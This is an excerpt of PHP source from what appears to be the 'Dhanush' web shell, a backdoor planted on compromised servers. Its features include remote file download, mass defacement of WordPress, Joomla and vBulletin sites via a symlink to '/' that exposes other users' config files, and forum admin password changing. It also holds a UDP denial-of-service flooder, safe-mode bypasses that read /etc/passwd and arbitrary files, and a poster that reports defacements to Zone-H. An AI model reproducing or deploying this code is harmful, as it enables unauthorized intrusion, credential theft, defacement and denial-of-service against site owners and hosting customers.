4020 break;
4021 case 'wlynx':
4022 execmd(which('lynx')." -source ".$url." > ".$namafile);
4023 break;
4024 case 'wfread' :
4025 execmd($wurl,$namafile);
4026 break;
4027 case 'wfetch' :
4028 execmd(which('fetch')." -o ".$namafile." -p ".$url);
4029 break;
4030 case 'wlinks' :
4031 execmd(which('links')." -source ".$url." > ".$namafile);
4032 break;
4033 case 'wget' :
4034 execmd(which('GET')." ".$url." > ".$namafile);
4035 break;
4036 case 'wcurl' :
4037 execmd(which('curl')." ".$url." -o ".$namafile);
4038 break;
4039 default:
4040 break;
4041 }
4042 return $namafile;
4043 }
4044 $namafile = remotedownload($functiontype,$wurl);
4045
4046 $fullpath = $path . $directorysperator . $namafile;
4047 if(is_file($fullpath))
4048 {
4049 echo "<center><font class=txt>File uploaded to $fullpath</font></center>";
4050 }
4051 else
4052 echo "<center>Failed to upload $namafile</center>";
4053}
4054else if(isset($_GET['createfolder']))
4055{
4056 if(!mkdir($_GET['createfolder']))
4057 echo '<BR>Failed To create<BR><input name="save" type="button" onClick="cancel()" value=" OK " id="spacing" class="but"/><BR><BR>';
4058 else
4059 echo '<BR><font class=txt>Folder Created Successfully</font><BR><input name="save" type="button" onClick="cancel()" value=" OK " id="spacing" class="but"/><BR><BR>';
4060}
4061else if(isset($_GET['selfkill']))
4062{
4063 if(unlink($curfile))
4064 echo "<br><center><font size=5>Good Bye......</font></center>";
4065 else
4066 echo "<br><center><font size=5>Shell cannot be removed......</font></center>";
4067}
4068else if(isset($_GET['Create']))
4069{
4070 ?><BR>
4071 <form method="post">
4072 <input type="hidden" name="filecreator" value="<?php echo $_GET['Create']; ?>">
4073 <textarea name="filecontent" rows="12" cols="100" class="box"></textarea><br />
4074 <input type="button" onClick="createfile(filecreator.value,filecontent.value)" value=" Save " class="but"/>
4075 <input name="save" type="button" onClick="cancel()" value="Cancel" id="spacing" class="but"/>
4076 </form>
4077
4078<?php }
4079else if(isset($_GET['readfile']))
4080{
4081 if(is_file($_GET['readfile']))
4082 {
4083 $owner = "0/0";
4084 if($os == "Linux")
4085 $owner = getOGid($_GET['readfile']);
4086 ?>
4087 <form>
4088 <table style="width:57%;">
4089 <tr align="left">
4090 <td align="left">File : </td><td><font class=txt><?php echo $_GET['readfile'];?></font></td><td align="left">Permissions : </td><td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo addslashes($_GET['readfile']); ?>')"><?php echo filepermscolor($_GET['readfile']);?></a></td>
4091 </tr>
4092 <tr>
4093 <td>Size : </td><td><?php echo HumanReadableFileSize(filesize($_GET['readfile']));?></td><td>Owner/Group : </td><td><font class=txt><?php echo $owner;?></font></td>
4094 </tr>
4095 </table>
4096 <textarea name="content" rows="15" cols="100" class="box"><?php
4097 $content = htmlspecialchars(file_get_contents($_GET['readfile']));
4098 if($content)
4099 {
4100 echo $content;
4101 }
4102 else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
4103 {
4104 if(filesize($_GET['readfile']) != 0 )
4105 {
4106 fopen($_GET['readfile']);
4107 while(!feof())
4108 {
4109 echo htmlspecialchars(fgets($_GET['readfile']));
4110 }
4111 }
4112 }
4113
4114 ?>
4115 </textarea><br />
4116 <input name="save" type="button" onClick="savemyfile('<?php echo addslashes($_GET['readfile']); ?>',content.value)" value="Save Changes" id="spacing" class="but"/>
4117 <input type="button" onClick="cancel()" value="cancel" class="but" />
4118 </form>
4119 <?php
4120 }
4121 else
4122 echo '<BR><input name="save" type="button" onClick="cancel()" value=" OK " id="spacing" class="but"/><BR>File does not exist !!!!<BR>';
4123}
4124else if(isset($_POST['filecreator'])&&isset($_POST['filecontent']))
4125{
4126 $content = $_POST['filecontent'];
4127 if($file_pointer = fopen($_POST['filecreator'], "w+"))
4128 {
4129 fwrite($file_pointer, $content);
4130 fclose($file_pointer);
4131 echo "<font class=txt>File Created Successfully</font>";
4132 }
4133 else
4134 echo "Cannot Create File";
4135}
4136else if(isset($_REQUEST["massdeface"]))
4137{
4138?><center><table><tr><td><a href=# onClick="getmydefacedata('masswp')"><font class=txt size="4">| Wordpress |</font></a></td>
4139 <td><a href=# onClick="getmydefacedata('massjo')"><font class=txt size="4">| Joomla |</font></a></td>
4140 <td><a href=# onClick="getmydefacedata('massvb')"><font class=txt size="4">| Vbulletin |</font></a></td>
4141 </tr></table></center><br><div id="showmydeface"></div><?php
4142}
4143else if(isset($_REQUEST["masswp"]))
4144{
4145 ?><center><form method="post">
4146 <textarea id="massdef" cols=80 rows="19" class="box">You Just Got Hacked</textarea>
4147 <br><input type="button" onClick="massdeface('domasswp',massdef.value)" class="but" value=" Go "></form></center><br><div id="showdef"></div><?php
4148}
4149else if(isset($_REQUEST["massjo"]))
4150{
4151 ?><center><form method="post"><textarea id="massdef" cols=80 rows="20" class="box">You Just Got Hacked</textarea>
4152 <br><input type="button" onClick="massdeface('domassjo',massdef.value)" class="but" value=" Go "></form></center><br><div id="showdef"></div><?php
4153}
4154else if(isset($_REQUEST["massvb"]))
4155{
4156 ?><center><form method="post"><textarea id="massdef" cols=80 rows="20" class="box">You Just Got Hacked</textarea>
4157 <br><input type="button" onClick="massdeface('domassvb',massdef.value)" class="but" value=" Go "></form></center><br><div id="showdef"></div><?php
4158}
4159else if(isset($_REQUEST["massscript"]))
4160{
4161 if($os != "Windows")
4162 {
4163 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
4164 $path=explode('/',$url);
4165 $url =str_replace($path[count($path)-1],'',$url);
4166
4167 if($_REQUEST["massscript"] == "domasswp")
4168 {
4169 echo "<center><table border=1 style='width:70%;'><tr align=center><th>Site</th><th>Message</th><tr>";
4170 mkdir("dhanush");
4171 chdir("dhanush");
4172 execmd("ln -s / root");
4173 $file3 = 'Options all
4174 DirectoryIndex Sux.html
4175 AddType text/plain .php
4176 AddHandler server-parsed .php
4177 AddType text/plain .html
4178 AddHandler txt .html
4179 Require None
4180 Satisfy Any
4181 ';
4182 $fp3 = fopen('.htaccess','w');
4183 $fw3 = fwrite($fp3,$file3);
4184 @fclose($fp3);
4185 if(@file('/etc/passwd'))
4186 {
4187 $users = file('/etc/passwd');
4188 foreach($users as $user)
4189 {
4190 $user = explode(':', $user);
4191
4192 $conf = @file_get_contents($url."dhanush/root/home/".$user[0]."/public_html/wp-config.php");
4193 if(entre2v2($conf,"define('DB_USER', '","');"))
4194 changeindexwp($conf,$_REQUEST['massdef']);
4195 }
4196 }
4197 else
4198 {
4199 $temp = "";
4200 $val1 = 0;
4201 $val2 = 1000;
4202 for(;$val1 <= $val2;$val1++)
4203 {
4204 $uid = @posix_getpwuid($val1);
4205 if ($uid)
4206 $temp .= join(':',$uid)."\n";
4207 }
4208
4209 $temp = trim($temp);
4210
4211 if($file5 = fopen("test.txt","w"))
4212 {
4213 fputs($file5,$temp);
4214 fclose($file5);
4215
4216 $file = fopen("test.txt", "r");
4217 while(!feof($file))
4218 {
4219 $s = fgets($file);
4220 $matches = array();
4221 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
4222 $matches = str_replace("home/","",$matches[1]);
4223 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
4224 continue;
4225 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/wp-config.php");
4226 if(entre2v2($conf,"define('DB_USER', '","');"))
4227 changeindexwp($conf,$_REQUEST['massdef']);
4228 }
4229 fclose($file);
4230 }
4231 }
4232 }
4233 elseif($_REQUEST["massscript"] == "domassjo")
4234 {
4235 mkdir("dhanush");
4236 chdir("dhanush");
4237 $d0mains = @file("/etc/named.conf");
4238 if($d0mains)
4239 {
4240 $defcount = 0;
4241 echo "<center><table border=1 style='width:80%;'><tr align=center><th>Login new info</th><th>Login info</th><th>Site</th><th>Message</th><tr>";
4242 foreach($d0mains as $d0main)
4243 {
4244 if(eregi("zone",$d0main))
4245 {
4246 preg_match_all('#zone "(.*)"#', $d0main, $domains);
4247 flush();
4248
4249 if(strlen(trim($domains[1][0])) > 2)
4250 {
4251 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
4252 $conf = @file_get_contents($url."dhanush/root/home/".$user['name']."/public_html/configuration.php");
4253 if(entre2v2($conf,$dol."user = '","';"))
4254 changeindexjo($conf,$_REQUEST['massdef'],$domains[1][0]);
4255 }
4256 }
4257 }
4258 echo '</table><br><h3>'.$defcount.' sites defaced</h3>';
4259 }
4260 else
4261 echo "Cannot Read /etc/named.conf";
4262 }
4263 elseif($_REQUEST["massscript"] == "domassvb")
4264 {
4265 mkdir("dhanush");
4266 chdir("dhanush");
4267 echo "<center><table border=1 style='width:70%;'><tr align=center><th>Site</th><th>Message</th><tr>";
4268
4269 if(@file('/etc/passwd'))
4270 {
4271 $users = file('/etc/passwd');
4272 foreach($users as $user)
4273 {
4274 $user = explode(':', $user);
4275 $conf = @file_get_contents($url."dhanush/root/home/".$user['0']."/public_html/includes/config.php");
4276 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4277 changeindexvb($conf,$_REQUEST['massdef']);
4278 $conf = @file_get_contents($url."dhanush/root/home/".$user['0']."/public_html/vb/configuration.php");
4279 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4280 changeindexvb($conf,$_REQUEST['massdef']);
4281 $conf = @file_get_contents($url."dhanush/root/home/".$user['0']."/public_html/forum/configuration.php");
4282 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4283 changeindexvb($conf,$_REQUEST['massdef']);
4284 $conf = @file_get_contents($url."dhanush/root/home/".$user['0']."/public_html/core/configuration.php");
4285 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4286 changeindexvb($conf,$_REQUEST['massdef']);
4287 $conf = @file_get_contents($url."dhanush/root/home/".$user['0']."/public_html/vb/core/configuration.php");
4288 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4289 changeindexvb($conf,$_REQUEST['massdef']);
4290 }
4291 }
4292 else
4293 {
4294 $temp = "";
4295 $val1 = 0;
4296 $val2 = 1000;
4297 for(;$val1 <= $val2;$val1++)
4298 {
4299 $uid = @posix_getpwuid($val1);
4300 if ($uid)
4301 $temp .= join(':',$uid)."\n";
4302 }
4303
4304 $temp = trim($temp);
4305
4306 if($file5 = fopen("test.txt","w"))
4307 {
4308 fputs($file5,$temp);
4309 fclose($file5);
4310
4311 $file = fopen("test.txt", "r");
4312 while(!feof($file))
4313 {
4314 $s = fgets($file);
4315 $matches = array();
4316 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
4317 $matches = str_replace("home/","",$matches[1]);
4318 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
4319 continue;
4320 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/includes/config.php");
4321 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4322 changeindexvb($conf,$_REQUEST['massdef']);
4323 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/vb/configuration.php");
4324 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4325 changeindexvb($conf,$_REQUEST['massdef']);
4326 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/forum/configuration.php");
4327 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4328 changeindexvb($conf,$_REQUEST['massdef']);
4329 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/core/configuration.php");
4330 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4331 changeindexvb($conf,$_REQUEST['massdef']);
4332 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/vb/core/configuration.php");
4333 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4334 changeindexvb($conf,$_REQUEST['massdef']);
4335 changeindexvb($conf,$_REQUEST['massdef']);
4336 }
4337 fclose($file);
4338 }
4339 }
4340 }
4341 echo "</table><center>";
4342 }
4343 else
4344 echo "<center>Cannot do mass deface</center>";
4345}
4346else if(isset($_REQUEST["defaceforum"]))
4347{
4348 ?>
4349 <center><div id="showdeface"></div>
4350 <font size="4">Forum Index Changer</font>
4351 <form action="<?php echo $self; ?>" method = "POST">
4352 <input type="hidden" name="forum">
4353 <input type="hidden" name="defaceforum">
4354 <table class=btmtbl border = "1" width="60%" style="text-align: center;" align="center">
4355 <tr>
4356 <td height="50" width="50%"> Host : <input class="sbox" type="text" name="f1" size="20" value="localhost"></td>
4357
4358 <td width="50%"> Database : <input type ="text" class="sbox" name = "f2" size="20"></td></tr>
4359 <tr><td height="50" width="50%">User : <input type ="text" class="sbox" name = "f3" size="20"> </td>
4360 <td> Password : <input class="sbox" type ="text" name = "f4" size="20"></td></tr>
4361
4362 <tr><td height="50" width="50%">Type :
4363 <select class=sbox id="forumdeface" name="forumdeface" onChange="checkforum(this.value)">
4364 <option value="vb">vbulletin</option>
4365 <option value="mybb">Mybb</option>
4366 <option value="smf">SMF</option>
4367 <option value="ipb">IPB</option>
4368 <option value="wp">Wordpress</option>
4369 <option value="joomla">Joomla</option>
4370 </select></td>
4371 <td height="50" width="50%">Prefix : <input type="text" id="tableprefix" name="tableprefix" class="sbox"></td></td>
4372
4373 </tr>
4374 <tr>
4375 <td height="167" width="50%" colspan=2>
4376 <div style="display:none;" id="myjoomla"><p><b>Site URL : </b><input class="box" type="text" id="siteurl" name="siteurl" width="80" value="http://site.com/administrator/"></p></div>
4377
4378 <div style="display:none;" id="smfipb"><p align="center"><b>Head : </b><input class="sbox" type="text" name="head" size="20" value="Hacked"> <b>Kate ID : </b><input class="sbox" type="text" name="f5" size="20" value="1">
4379
4380 </div>
4381
4382 <p align="center"> <textarea class="box" name="index" cols=53 rows=8><b>lol ! You Are Hacked !!!!</b></textarea><p align="center">
4383 <input type="button" onClick="forumdefacefn(index.value,f1.value,f2.value,f3.value,f4.value,forumdeface.value,tableprefix.value,siteurl.value,head.value,f5.value)" class="but" value = "Hack It">
4384 </td>
4385 </tr>
4386 </table>
4387 </form>
4388 </center>
4389 <?php
4390 }
4391 else if(isset($_GET["passwordchange"]))
4392 {
4393 echo "<center>";
4394 ?>
4395 <div id="showchangepass"></div>
4396 <font size="4">Forum Password Changer</font>
4397 <form onSubmit="changeforumpassword('forumpass',f1.value,f2.value,f3.value,f4.value,forums.value,tableprefix.value,ipbuid.value,newipbpass.value,username.value,newjoomlapass.value,uname.value,newpass.value);return false;">
4398 <table class=btmtbl border = "1" width="60%" height="246" style="text-align: center;" align="center">
4399 <tr>
4400 <td height="50" width="50%"> Host : <input class="sbox" type="text" name="f1" size="20" value="localhost"></td><td height="50" width="50"> DataBase : <input type ="text" class="sbox" name = "f2" size="20"></td> <tr><td height="50" width="50%"> User : <input type ="text" class="sbox" name = "f3" size="20"></td><td height="50" width="50%"> Password : <input class="sbox" type ="text" name = "f4" size="20"></td></tr>
4401 <tr>
4402 <td height="50" width="50%">Type :
4403 <select class=sbox id="forums" name="forums" onChange="showMsg(this.value)">
4404 <option value="vb">vbulletin</option>
4405 <option value="mybb">Mybb</option>
4406 <option value="smf">SMF</option>
4407 <option value="ipb">IPB</option>
4408 <option value="phpbb">PHPBB</option>
4409 <option value="wp">Wordpress</option>
4410 <option value="joomla">Joomla</option>
4411 </select></td>
4412 <td height="50" width="50%">Prefix : <input type="text" id="tableprefix" name="tableprefix" class="sbox"></td>
4413 </tr>
4414 <tr>
4415 <td colspan=2 height="100" width="780">
4416
4417 <p align="center"><div id="fid" style="display:block;">User ID : <input class="sbox" type="text" name="ipbuid" size="20" value="1"> New Password : <input type ="text" class="sbox" name = "newipbpass" size="20" value="hacked"></div>
4418
4419 <div id="joomla" style="display:none;">New Username : <input style="width:170px;" class="box" type="text" name="username" size="20" value="admin"> New Password : <input type ="text" class="sbox" name = "newjoomlapass" size="20" value="hacked"></div>
4420
4421 <div id="wpress" style="display:none;"><p>New Username : <input style="width:170px;" class="box" type="text" name="uname" size="20" value="admin"> New Password : <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p></div>
4422
4423 <p><input type = "button" onClick="changeforumpassword('forumpass',f1.value,f2.value,f3.value,f4.value,forums.value,tableprefix.value,ipbuid.value,newipbpass.value,username.value,newjoomlapass.value,uname.value,newpass.value)" class="but" value = " Change IT " name="forumpass"></p></td>
4424 </tr>
4425 </table>
4426 </form>
4427 </center>
4428 <?php
4429}
4430else if(isset($_GET['dosser']))
4431{
4432 if(isset($_GET['ip']) && isset($_GET['exTime']) && isset($_GET['port']) && isset($_GET['timeout']) && isset($_GET['exTime']) && $_GET['exTime'] != "" &&
4433 $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['timeout'] != "" && $_GET['exTime'] != "" )
4434 {
4435 $IP=$_GET['ip'];
4436 $port=$_GET['port'];
4437 $executionTime = $_GET['exTime'];
4438 $no0fBytes = $_GET['no0fBytes'];
4439 $data = "";
4440 $timeout = $_GET['timeout'];
4441 $packets = 0;
4442 $counter = $no0fBytes;
4443 $maxTime = time() + $executionTime;;
4444 while($counter--)
4445 {
4446 $data .= "X";
4447 }
4448 $data .= " Dhanush";
4449
4450 while(1)
4451 {
4452 $socket = fsockopen("udp://$IP", $port, $error, $errorString, $timeout);
4453 if($socket)
4454 {
4455 fwrite($socket , $data);
4456 fclose($socket);
4457 $packets++;
4458 }
4459 if(time() >= $maxTime)
4460 {
4461 break;
4462 }
4463 }
4464 echo "Dos Completed!<br>";
4465 echo "DOS attack against udp://$IP:$port completed on ".date("h:i:s A")."<br />";
4466 echo "Total Number of Packets Sent : " . $packets . "<br />";
4467 echo "Total Data Sent = ". HumanReadableFilesize($packets*$no0fBytes) . "<br />";
4468 echo "Data per packet = " . HumanReadableFilesize($no0fBytes) . "<br />";
4469 }
4470}
4471else if(isset($_GET['fuzzer']))
4472{
4473 if(isset($_GET['ip']) && isset($_GET['port']) && isset($_GET['timeout']) && isset($_GET['exTime']) && isset($_GET['no0fBytes']) && isset($_GET['multiplier']) && $_GET['no0fBytes'] != "" && $_GET['exTime'] != "" && $_GET['timeout'] != "" && $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['multiplier'] != "")
4474 {
4475 $IP=$_GET['ip'];
4476 $port=$_GET['port'];
4477 $times = $_GET['exTime'];
4478 $timeout = $_GET['timeout'];
4479 $send = 0;
4480 $ending = "";
4481 $multiplier = $_GET['multiplier'];
4482 $data = "";
4483 $mode="tcp";
4484 $data .= "GET /";
4485 $ending .= " HTTP/1.1\n\r\n\r\n\r\n\r";
4486 if($_GET['type'] == "tcp")
4487 {
4488 $mode = "tcp";
4489 }
4490
4491 while($multiplier--)
4492
4493 {
4494 $data .= urlencode($_GET['no0fBytes']);
4495 }
4496 $data .= "%s%s%s%s%d%x%c%n%n%n%n";// add some format string specifiers
4497 $data .= "by-Dhanush".$ending;
4498 $length = strlen($data);
4499
4500
4501 echo "Sending Data :- <br /> <p align='center'>$data</p>";
4502
4503 for($i=0;$i<$times;$i++)
4504 {
4505 $socket = fsockopen("$mode://$IP", $port, $error, $errorString, $timeout);
4506 if($socket)
4507 {
4508 fwrite($socket , $data , $length );
4509 fclose($socket);
4510 }
4511 }
4512 echo "Fuzzing Completed!<br>";
4513 echo "DOS attack against $mode://$IP:$port completed on ".date("h:i:s A")."<br />";
4514 echo "Total Number of Packets Sent : " . $times . "<br />";
4515 echo "Total Data Sent = ". HumanReadableFilesize($times*$length) . "<br />";
4516 echo "Data per packet = " . HumanReadableFilesize($length) . "<br />";
4517 }
4518}
4519else if(isset($_GET['bypassit']))
4520{
4521 echo "<BR>";
4522 if(isset($_GET['copy']))
4523 {
4524 if(@copy($_GET['copy'],"test1.php"))
4525 {
4526 $fh=fopen("test1.php",'r');
4527 echo "<textarea cols=100 rows=20 class=box readonly>".htmlspecialchars(@fread($fh,filesize("test1.php")))."</textarea>";
4528 @fclose($fh);
4529 unlink("test1.php");
4530 }
4531 }
4532 else if(isset($_GET['filecontents']))
4533 {
4534 echo "<textarea cols=100 rows=20 class=box readonly>";
4535 echo file_get_contents($_GET['filecontents']);
4536 echo "</textarea>";
4537 }
4538 else if(isset($_GET['stream']))
4539 {
4540 echo "<textarea cols=100 rows=20 class=box readonly>";
4541 $file=$_GET['stream'];
4542 if ($stream = fopen($file, 'r')) {
4543 echo stream_get_contents($stream, -1, 0);
4544 fclose($stream);
4545 }
4546
4547 echo "</textarea>";
4548 }
4549 else if(isset($_GET['curl']))
4550 {
4551 $ch=curl_init("file://" . $_GET[curl]);
4552 curl_setopt($ch,CURLOPT_HEADERS,0);
4553 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
4554 $file_out=curl_exec($ch);
4555 curl_close($ch);
4556 echo "<textarea cols=100 rows=20 class=box readonly>".htmlspecialchars($file_out)."</textarea>";
4557 }
4558 else if(isset($_GET['include']))
4559 {
4560 if(file_exists($_GET['include']))
4561 {
4562 echo "<textarea cols=100 rows=20 class=box readonly>";
4563 @include($_GET['include']);
4564 echo "</textarea>";
4565 }
4566 else
4567 echo "<br><center><font size=3>Can't Read" . $_GET['include'] . "</font></center>";
4568 }
4569 else if(isset($_GET['id']))
4570 {
4571 echo "<textarea cols=100 rows=20 class=box readonly>";
4572 for($uid=0;$uid<60000;$uid++)
4573 {
4574 $ara = posix_getpwuid($uid);
4575 if (!empty($ara))
4576 {
4577 while (list ($key, $val) = each($ara))
4578 {
4579 print "$val:";
4580 }
4581 print "\n";
4582 }
4583 }
4584 echo "</textarea>";
4585 }
4586 else if(isset($_GET['tempnam']))
4587 {
4588 echo "<textarea cols=100 rows=20 class=box readonly>";
4589 $mytmp = tempnam ( 'tmp', $_GET['tempnam'] );
4590 $fp = fopen ( $mytmp, 'r' );
4591 while(!feof($fp))
4592 echo fgets($fp);
4593 fclose ( $fp );
4594 echo "</textarea>";
4595 }
4596 else if(isset($_GET['symlnk']))
4597 {
4598 echo "<textarea cols=100 rows=20 class=box readonly>";
4599 @mkdir("mydhanush",0777);
4600 @chdir("mydhanush");
4601 execmd("ln -s /etc/passwd");
4602
4603 echo file_get_contents($curr_url . "/mydhanush/passwd");
4604 echo "</textarea>";
4605 }
4606 if(isset($_GET['newtype']))
4607 {
4608 $filename = $_GET['newtype'];
4609 echo "<textarea cols=100 rows=20 class=box readonly>";
4610 if($_GET['optiontype'] == "xxd")
4611 echo execmd("xxd ".$filename);
4612 else if($_GET['optiontype'] == "rev")
4613 echo execmd("rev ".$filename);
4614 if($_GET['optiontype'] == "tac")
4615 echo execmd("tac ".$filename);
4616 if($_GET['optiontype'] == "more")
4617 echo execmd("more ".$filename);
4618 if($_GET['optiontype'] == "less")
4619 echo execmd("less ".$filename);
4620 if($_GET['optiontype'] == "awk")
4621 echo execmd("awk '{ print }' ".$filename);
4622 echo "</textarea>";
4623 }
4624 echo '<BR><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 2px;" /><BR><BR><BR>';
4625}
4626// Deface Website
4627else if(isset($_GET['deface']))
4628{
4629 $myfile = fopen($_GET['deface'],'w');
4630 if(fwrite($myfile, base64_decode($ind)))
4631 {fclose($myfile);
4632 echo "Index Defaced Successfully";}
4633 else
4634 echo "Donot have write permission";
4635}
4636else if(isset($_GET['perms']))
4637{
4638?><br>
4639 <form>
4640 <input type="hidden" name="myfilename" value="<?php echo $_GET['myfilepath']; ?>">
4641 <table align="center" border="1" style="width:40%;border-color:#333333;border-collapse:collapse;">
4642 <tr>
4643 <td style="height:40px" align="right">Change Permissions </td><td align="center"><input value="0755" name="chmode" class="sbox" /></td>
4644 </tr>
4645 <tr>
4646 <td colspan="2" align="center" style="height:60px">
4647 <input type="button" onClick="changeperms(chmode.value,myfilename.value)" value="Change Permission" class="but" style="padding: 5px;" />
4648 <input type="button" onClick="cancel()" value="cancel" class="but" style="padding: 5px;" />
4649 </td>
4650 </tr>
4651 </table>
4652
4653 </form>
4654 <?php
4655}
4656else if(isset($_GET["chmode"]))
4657{
4658 if($_GET['chmode'] != null && is_numeric($_GET['chmode']))
4659 {
4660 echo '<br>';
4661 $perms = 0;
4662 for($i=strlen($_GET['chmode'])-1;$i>=0;--$i)
4663 $perms += (int)$_GET['chmode'][$i]*pow(8, (strlen($_GET['chmode'])-$i-1));
4664 if(@chmod($_GET['myfilename'],$perms))
4665 echo "<center><blink><font class=txt>File Permissions Changed Successfully</font></blink></center>";
4666 else
4667 echo "<center><blink>Cannot Change File Permissions</blink></center>";
4668 echo '<BR><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" /><BR><BR>';
4669 }
4670}
4671else if(isset($_GET['rename']))
4672{
4673?><BR>
4674 <form>
4675 <table border="0" cellpadding="7" cellspacing="3">
4676 <tr>
4677 <td>File </td><td><input value="<?php echo $_GET['myfilepath'];?>" name="file" class="box" /></td>
4678 </tr>
4679 <tr>
4680 <td>To </td><td><input value="<?php echo $_GET['myfilepath'];?>" name="to" class="box" /></td>
4681 </tr>
4682 <tr>
4683 <td colspan="2"><input type="button" onClick="renamefun(file.value,to.value)" value="Rename It" class="but" style="margin-left: 160px;padding: 5px;"/>
4684 <input type="button" onClick="cancel()" value="cancel" class="but" style="padding: 5px;" />
4685 </td>
4686 </tr>
4687 </table>
4688 </form>
4689 <?php
4690
4691}
4692else if(isset($_GET['renamemyfile']))
4693{
4694 if(isset($_GET['to']) && isset($_GET['file']))
4695 {
4696 echo '<br>';
4697 if(!rename($_GET['file'], $_GET['to']))
4698 echo "Cannot Rename File";
4699 else
4700 echo "<font class=txt>File Renamed Successfully</font>";
4701 echo '<br><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" /><BR><BR>';
4702 }
4703}
4704else if(isset($_GET['open']))
4705{
4706 if(is_file($_GET['myfilepath']))
4707 {
4708 $owner = "0/0";
4709 if($os == "Linux")
4710 $owner = getOGid($_GET['myfilepath']);
4711 ?>
4712 <form>
4713 <table style="width:57%;">
4714 <tr align="left">
4715 <td align="left">File : </td><td><font class=txt><?php echo $_GET['myfilepath'];?></font></td><td align="left">Permissions : </td><td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo addslashes($_GET['myfilepath']); ?>')"><?php echo filepermscolor($_GET['myfilepath']);?></a></td>
4716 </tr>
4717 <tr>
4718 <td>Size : </td><td><?php echo HumanReadableFileSize(filesize($_GET['myfilepath']));?></td><td>Owner/Group : </td><td><font class=txt><?php echo $owner;?></font></td>
4719 </tr>
4720 </table>
4721 <textarea name="content" rows="15" cols="100" class="box"><?php
4722 $content = htmlspecialchars(file_get_contents($_GET['myfilepath']));
4723 if($content)
4724 {
4725 echo $content;
4726 }
4727 else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
4728 {
4729 if(filesize($_GET['myfilepath']) != 0 )
4730 {
4731 fopen($_GET['myfilepath']);
4732 while(!feof())
4733 {
4734 echo htmlspecialchars(fgets($_GET['myfilepath']));
4735 }
4736 }
4737 }
4738
4739 ?>
4740 </textarea><br />
4741 <input name="save" type="button" onClick="savemyfile('<?php echo addslashes($_GET['myfilepath']); ?>',content.value)" value="Save Changes" id="spacing" class="but"/>
4742 <input name="save" type="button" onClick="cancel()" value="Cancel" id="spacing" class="but"/>
4743 </form>
4744 <?php
4745 }
4746 else
4747 echo '<BR><input name="save" type="button" onClick="cancel()" value=" OK " id="spacing" class="but"/><BR>File does not exist !!!!<BR>';
4748}
4749else if(isset($_POST['file']) && isset($_POST['content']))
4750{
4751 echo '<BR>';
4752 if(file_exists($_POST['file']))
4753 {
4754 $handle = fopen($_POST['file'],"w");
4755 if(fwrite($handle,$_POST['content']))
4756 echo "<font class=txt>File Saved Successfully!</font>";
4757 else
4758 echo "Cannot Write into File";
4759 }
4760 else
4761 {
4762 echo "File Name Specified does not exists!";
4763 }
4764 echo '<BR><input type="button" onClick="cancel()" value=" OK " class="but" /><BR><BR>';
4765}
4766else if(isset($_POST["SendNowToZoneH"]))
4767{
4768 $hacker = $_POST['defacer'];
4769 $method = $_POST['hackmode'];
4770 $neden = $_POST['reason'];
4771 $site = $_POST['domain'];
4772
4773 if (empty($hacker))
4774 {
4775 die("<center><font size=3>[-] You Must Fill the Attacker name !</font></center>");
4776 }
4777 elseif($method == "--------SELECT--------")
4778 {
4779 die("<center><font size=3>[-] You Must Select The Method !</center>");
4780 }
4781 elseif($neden == "--------SELECT--------")
4782 {
4783 die("<center><font size=3>[-] You Must Select The Reason</center>");
4784 }
4785 elseif(empty($site))
4786 {
4787 die("<center><font size=3>[-] You Must Inter the Sites List !</center>");
4788 }
4789 // Zone-h Poster
4790 function ZoneH($url, $hacker, $hackmode,$reson, $site )
4791 {
4792 $k = curl_init();
4793 curl_setopt($k, CURLOPT_URL, $url);
4794 curl_setopt($k,CURLOPT_POST,true);
4795 curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
4796 curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
4797 curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
4798 $kubra = curl_exec($k);
4799 curl_close($k);
4800 return $kubra;
4801 }
4802
4803 $i = 0;
4804 $sites = explode("\n", $site);
4805 echo "<pre class=ml1 style='margin-top:5px'>";
4806 while($i < count($sites))
4807 {
4808 if(substr($sites[$i], 0, 4) != "http")
4809 {
4810 $sites[$i] = "http://".$sites[$i];
4811 }
